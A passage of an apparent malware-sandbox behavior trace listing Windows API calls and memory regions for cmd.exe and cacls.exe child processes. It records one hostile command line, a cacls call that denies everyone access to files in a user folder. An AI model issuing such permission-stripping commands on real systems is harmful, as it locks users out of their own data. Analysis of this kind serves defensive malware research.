lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xd9fe78 | out: phkResult=0xd9fe78*=0x0) returned 0x2 [0035.690] VirtualQuery (in: lpAddress=0xd9fe87, lpBuffer=0xd9fe20, dwLength=0x1c | out: lpBuffer=0xd9fe20*(BaseAddress=0xd9f000, AllocationBase=0xca0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0035.690] VirtualQuery (in: lpAddress=0xca0000, lpBuffer=0xd9fe20, dwLength=0x1c | out: lpBuffer=0xd9fe20*(BaseAddress=0xca0000, AllocationBase=0xca0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0035.690] VirtualQuery (in: lpAddress=0xca1000, lpBuffer=0xd9fe20, dwLength=0x1c | out: lpBuffer=0xd9fe20*(BaseAddress=0xca1000, AllocationBase=0xca0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0035.690] VirtualQuery (in: lpAddress=0xca3000, lpBuffer=0xd9fe20, dwLength=0x1c | out: lpBuffer=0xd9fe20*(BaseAddress=0xca3000, AllocationBase=0xca0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0035.690] VirtualQuery (in: lpAddress=0xda0000, lpBuffer=0xd9fe20, dwLength=0x1c | out: lpBuffer=0xd9fe20*(BaseAddress=0xda0000, AllocationBase=0xda0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0035.690] GetConsoleOutputCP () returned 0x1b5 [0035.691] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.691] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0035.691] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.691] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x0) returned 0 [0035.691] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.691] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0035.691] _get_osfhandle (_FileHandle=0) returned 0x24 [0035.691] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0035.691] GetEnvironmentStringsW () returned 0x1124058* [0035.691] FreeEnvironmentStringsA (penv="=") returned 1 [0035.691] GetEnvironmentStringsW () returned 0x1124058* [0035.691] FreeEnvironmentStringsA (penv="=") returned 1 [0035.691] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xd9edc8 | out: phkResult=0xd9edc8*=0x40) returned 0x0 [0035.691] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xd9edd0, lpData=0xd9edd4, lpcbData=0xd9edcc*=0x1000 | out: lpType=0xd9edd0*=0x0, lpData=0xd9edd4*=0x2c, lpcbData=0xd9edcc*=0x1000) returned 0x2 [0035.691] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xd9edd0, lpData=0xd9edd4, lpcbData=0xd9edcc*=0x1000 | out: lpType=0xd9edd0*=0x4, lpData=0xd9edd4*=0x1, lpcbData=0xd9edcc*=0x4) returned 0x0 [0035.691] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xd9edd0, lpData=0xd9edd4, lpcbData=0xd9edcc*=0x1000 | out: lpType=0xd9edd0*=0x0, lpData=0xd9edd4*=0x1, lpcbData=0xd9edcc*=0x1000) returned 0x2 [0035.692] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xd9edd0, lpData=0xd9edd4, lpcbData=0xd9edcc*=0x1000 | out: lpType=0xd9edd0*=0x4, lpData=0xd9edd4*=0x0, lpcbData=0xd9edcc*=0x4) returned 0x0 [0035.692] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xd9edd0, lpData=0xd9edd4, lpcbData=0xd9edcc*=0x1000 | out: lpType=0xd9edd0*=0x4, lpData=0xd9edd4*=0x40, lpcbData=0xd9edcc*=0x4) returned 0x0 [0035.692] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xd9edd0, lpData=0xd9edd4, lpcbData=0xd9edcc*=0x1000 | out: lpType=0xd9edd0*=0x4, lpData=0xd9edd4*=0x40, lpcbData=0xd9edcc*=0x4) returned 0x0 [0035.692] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0xd9edd0, lpData=0xd9edd4, lpcbData=0xd9edcc*=0x1000 | out: lpType=0xd9edd0*=0x0, lpData=0xd9edd4*=0x40, lpcbData=0xd9edcc*=0x1000) returned 0x2 [0035.692] RegCloseKey (hKey=0x40) returned 0x0 [0035.692] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xd9edc8 | out: phkResult=0xd9edc8*=0x40) returned 0x0 [0035.692] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xd9edd0, lpData=0xd9edd4, lpcbData=0xd9edcc*=0x1000 | out: lpType=0xd9edd0*=0x0, lpData=0xd9edd4*=0x40, lpcbData=0xd9edcc*=0x1000) returned 0x2 [0035.692] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xd9edd0, lpData=0xd9edd4, lpcbData=0xd9edcc*=0x1000 | out: lpType=0xd9edd0*=0x4, lpData=0xd9edd4*=0x1, lpcbData=0xd9edcc*=0x4) returned 0x0 [0035.692] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xd9edd0, lpData=0xd9edd4, lpcbData=0xd9edcc*=0x1000 | out: lpType=0xd9edd0*=0x0, lpData=0xd9edd4*=0x1, lpcbData=0xd9edcc*=0x1000) returned 0x2 [0035.692] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xd9edd0, lpData=0xd9edd4, lpcbData=0xd9edcc*=0x1000 | out: lpType=0xd9edd0*=0x4, lpData=0xd9edd4*=0x0, lpcbData=0xd9edcc*=0x4) returned 0x0 [0035.692] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xd9edd0, lpData=0xd9edd4, lpcbData=0xd9edcc*=0x1000 | out: lpType=0xd9edd0*=0x4, lpData=0xd9edd4*=0x9, lpcbData=0xd9edcc*=0x4) returned 0x0 [0035.692] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xd9edd0, lpData=0xd9edd4, lpcbData=0xd9edcc*=0x1000 | out: lpType=0xd9edd0*=0x4, lpData=0xd9edd4*=0x9, lpcbData=0xd9edcc*=0x4) returned 0x0 [0035.692] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0xd9edd0, lpData=0xd9edd4, lpcbData=0xd9edcc*=0x1000 | out: lpType=0xd9edd0*=0x0, lpData=0xd9edd4*=0x9, lpcbData=0xd9edcc*=0x1000) returned 0x2 [0035.692] RegCloseKey (hKey=0x40) returned 0x0 [0035.692] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa5004e [0035.692] srand (_Seed=0x5aa5004e) [0035.692] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" [0035.692] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" [0035.692] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0035.692] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1124060, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0035.692] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0035.692] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0035.692] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0035.692] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0035.693] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0035.693] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0035.693] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0035.693] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0035.693] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0035.693] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0035.693] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0035.693] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0035.693] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0035.693] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd9fba8 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0035.693] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0xd9fba8, lpFilePart=0xd9fba4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xd9fba4*="Desktop") returned 0x1c [0035.693] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0035.693] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xd9f920 | out: lpFindFileData=0xd9f920) returned 0x1124270 [0035.693] FindClose (in: hFindFile=0x1124270 | out: hFindFile=0x1124270) returned 1 [0035.693] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0xd9f920 | out: lpFindFileData=0xd9f920) returned 0x1124270 [0035.693] FindClose (in: hFindFile=0x1124270 | out: hFindFile=0x1124270) returned 1 [0035.693] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0035.693] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0xd9f920 | out: lpFindFileData=0xd9f920) returned 0x1124270 [0035.693] FindClose (in: hFindFile=0x1124270 | out: hFindFile=0x1124270) returned 1 [0035.693] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0035.693] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0035.694] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0035.694] GetEnvironmentStringsW () returned 0x11260b0* [0035.694] FreeEnvironmentStringsA (penv="=") returned 1 [0035.694] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0035.694] GetConsoleOutputCP () returned 0x1b5 [0035.694] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.694] GetUserDefaultLCID () returned 0x409 [0035.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0035.695] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xd9fcd4, cchData=128 | out: lpLCData="0") returned 2 [0035.695] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xd9fcd4, cchData=128 | out: lpLCData="0") returned 2 [0035.695] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xd9fcd4, cchData=128 | out: lpLCData="1") returned 2 [0035.695] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0035.695] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0035.695] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0035.695] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0035.695] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0035.695] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0035.695] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0035.695] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0035.695] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0035.695] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0035.695] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0035.696] GetConsoleTitleW (in: lpConsoleTitle=0x1124d78, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0035.696] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0035.696] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0035.696] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0035.696] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0035.696] _wcsicmp (_String1="echo", _String2=")") returned 60 [0035.696] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0035.696] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0035.696] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0035.696] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0035.696] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0035.697] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0035.697] GetConsoleTitleW (in: lpConsoleTitle=0xd9f9c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0035.697] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0035.697] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0035.697] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0035.697] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0035.697] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0035.697] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0035.697] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0035.697] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0035.697] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0035.697] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0035.698] _vsnwprintf (in: _Buffer=0x12c8840, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0xd9f984 | out: _Buffer="y\r\n") returned 3 [0035.698] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.698] GetFileType (hFile=0x28) returned 0x3 [0035.698] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.698] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="y\r\n", cchWideChar=-1, lpMultiByteStr=0x12b6840, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\r\n", lpUsedDefaultChar=0x0) returned 4 [0035.698] WriteFile (in: hFile=0x28, lpBuffer=0x12b6840*, nNumberOfBytesToWrite=0x3, lpNumberOfBytesWritten=0xd9f974, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesWritten=0xd9f974*=0x3, lpOverlapped=0x0) returned 1 [0035.698] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.698] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x0) returned 0 [0035.698] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.698] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0035.698] _get_osfhandle (_FileHandle=0) returned 0x24 [0035.698] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0035.698] SetConsoleInputExeNameW () returned 0x1 [0035.699] GetConsoleOutputCP () returned 0x1b5 [0035.699] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.699] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.699] exit (_Code=0) Process: id = "11" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x118c3000" os_pid = "0xb60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "cacls \"C:\\Users\\5JgHKoaOfdp\\Links\\*.*\" /e /d everyone" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 526 start_va = 0xb30000 end_va = 0xb39fff entry_point = 0xb30000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\SysWOW64\\cacls.exe" (normalized: "c:\\windows\\syswow64\\cacls.exe") Region: id = 527 start_va = 0xb60000 end_va = 0xb7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 528 start_va = 0xb80000 end_va = 0xb81fff entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 529 start_va = 0xb90000 end_va = 0xb9efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b90000" filename = "" Region: id = 530 start_va = 0xba0000 end_va = 0xbdffff entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 531 start_va = 0xbe0000 end_va = 0xc1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 532 start_va = 0xc20000 end_va = 0xc23fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c20000" filename = "" Region: id = 533 start_va = 0xc30000 end_va = 0xc30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c30000" filename = "" Region: id = 534 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 535 start_va = 0x7efa0000 end_va = 0x7efc2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efa0000" filename = "" Region: id = 536 start_va = 0x7efc4000 end_va = 0x7efc4fff entry_point = 0x0 region_type = private name = "private_0x000000007efc4000" filename = "" Region: id = 537 start_va = 0x7efca000 end_va = 0x7efcafff entry_point = 0x0 region_type = private name = "private_0x000000007efca000" filename = "" Region: id = 538 start_va = 0x7efcd000 end_va = 0x7efcffff entry_point = 0x0 region_type = private name = "private_0x000000007efcd000" filename = "" Region: id = 539 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 540 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 541 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 542 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 543 start_va = 0xc40000 end_va = 0xc41fff entry_point = 0x0 region_type = private name = "private_0x0000000000c40000" filename = "" Region: id = 553 start_va = 0xc90000 end_va = 0xc9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c90000" filename = "" Region: id = 554 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 555 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 556 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 557 start_va = 0xb60000 end_va = 0xb6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b60000" filename = "" Region: id = 558 start_va = 0xb70000 end_va = 0xb73fff entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 559 start_va = 0xb80000 end_va = 0xb83fff entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 560 start_va = 0xc50000 end_va = 0xc52fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c50000" filename = "" Region: id = 561 start_va = 0xc60000 end_va = 0xc60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c60000" filename = "" Region: id = 562 start_va = 0xc70000 end_va = 0xc71fff entry_point = 0xc70000 region_type = mapped_file name = "cacls.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\cacls.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\cacls.exe.mui") Region: id = 563 start_va = 0xca0000 end_va = 0xd1dfff entry_point = 0xca0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 564 start_va = 0xd90000 end_va = 0xd9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d90000" filename = "" Region: id = 565 start_va = 0xdc0000 end_va = 0xebffff entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 566 start_va = 0xec0000 end_va = 0x1194fff entry_point = 0xec0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 567 start_va = 0x747f0000 end_va = 0x74814fff entry_point = 0x747f0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 568 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 569 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 570 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 571 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 572 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 573 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 574 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 575 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 576 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 577 start_va = 0x7eea0000 end_va = 0x7ef9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eea0000" filename = "" Thread: id = 13 os_tid = 0xb64 Process: id = "12" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x11ad5000" os_pid = "0xb68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 578 start_va = 0x510000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 579 start_va = 0x530000 end_va = 0x531fff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 580 start_va = 0x540000 end_va = 0x54efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 581 start_va = 0x550000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 582 start_va = 0x590000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 583 start_va = 0x690000 end_va = 0x693fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 584 start_va = 0x6a0000 end_va = 0x6a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 585 start_va = 0x6b0000 end_va = 0x6b1fff entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 586 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 587 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" 